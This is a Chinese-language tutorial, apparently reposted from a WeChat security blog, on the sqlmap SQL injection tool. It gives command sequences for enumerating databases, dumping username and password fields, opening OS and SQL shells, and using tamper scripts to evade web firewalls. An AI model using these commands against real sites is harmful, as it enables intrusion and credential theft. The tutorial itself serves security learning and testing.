sqlmap简介

SQLmap是一个自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL的SQL注入漏洞，目前支持的数据库是MySQL，Oracle，PostgreSQL，Microsoft  SQL  Server，Microsoft Acess，IBM DB2，SQLLite，Firebird，Sybase和SAP MaxDB……SQLmap采用几种独特的SQL注入技术，分别是盲推理SQL注入，UNION查询SQL注入，对查询和盲注。其广泛的功能和选项包括数据库指纹，枚举，数据库提取，访问目标文件系统，并在获取完全操作权限时实行任意命令。

SQLmap基于Python编写，只要安装了Python的操作系统就可以使用它，先分别介绍下在Windows下的安装和使用，然后介绍下在Kali Linux下的简单使用。

一、SQLMap判断是否存在注入

1、 sqlmap -u "http://XXXXXXX?id=1"

如果存在注入点，将会显示Web容器、数据库版本信息。

2、读取数据库：sqlmap -u "http://XXXXXXX?id=1" --dbs

3、查看当前应用程序所用数据库：sqlmap -u "http://XXXXXXX?id=1" --current-dbs

4、列出指定数据库的所有表：sqlmap -u "http://XXXXXXX?id=1" --tables -D "admin"

5、读取指定表中的字段名称：sqlmap -u "http://XXXXXXX?id=1" --columns -T "user" -D"admin"

6、读取指定字段的内容：sqlmap -u "http://XXXXXXX?id=1" --dump -C"username,password" -T "user" -D"admin"

--dump参数意为转存数据，-C参数指定字段名称，-T指定表名，-D指定数据库名称。如果有数据库关键字需要加上"[]",如[User]。

读取数据后，数据会存到sqlmap/output/下。

二、SQLMap的一些参数

1、测试注入点权限

测试所有用户的权限：sqlmap -u URL --privileges

测试a用户的权限：sqlmap -u URL -- privileges -U a

2、执行shell命令

sqlmap -u URL --os-cmd="net user"

系统交互的shell：sqlmap -u URL --os-shell

3、执行sql命令

SQL交互的shell，执行sql语句：sqlmap -u URL --sql-shell

sqlmap -u URL --sql-query="sql"

4、POST提交方式

sqlmap -u URL --data "POST参数"

5、显示详细的等级

sqlmap -u URL --dbs -v 1

-v 参数包含7个等级。

0:只显示Python的回溯、错误和关键消息。

1：显示信息和警告信息。

2：显示调试信息。

3：有效载荷注入。

4：显示HTTP请求。

5：显示HTTP响应头。

6：显示HTTP响应页面的内容。

6、注入HTTP请求

sqlmap -r test.txt --dbs

test.txt 的内容为HTTP请求。

7、注入等级

sqlmap -u URL --level 3

8、使用sqlmap插件

sqlmap -u URL -tamper "插件名称"

插件一般都保存在sqlmap目录下的tamper文件夹中，通常用来绕过WAF。

举例：

1、Kali中使用sqlmap跑数据库：

如果有注入点就会显示数据库类型、版本等：

2、暴库，列出所有数据库名：

#--dbms 缺省，默认情况下会探测web应用后端的数据库是什么；该步骤--dbms mysql 制定了数据库类型为myslq数据库
  #--dbs 当用户有权读取时，列出所有的数据库
  #--batch 该参数使用后不需要用户输入，将会使用sqlmap给的默认提示走下去

得到了7个数据库的名称：

可以继续得到数据库的表名、表数据等，更多实例分享敬请期待。。。

原文始发于微信公众号（白帽网络安全空间）：SQLmap的简单使用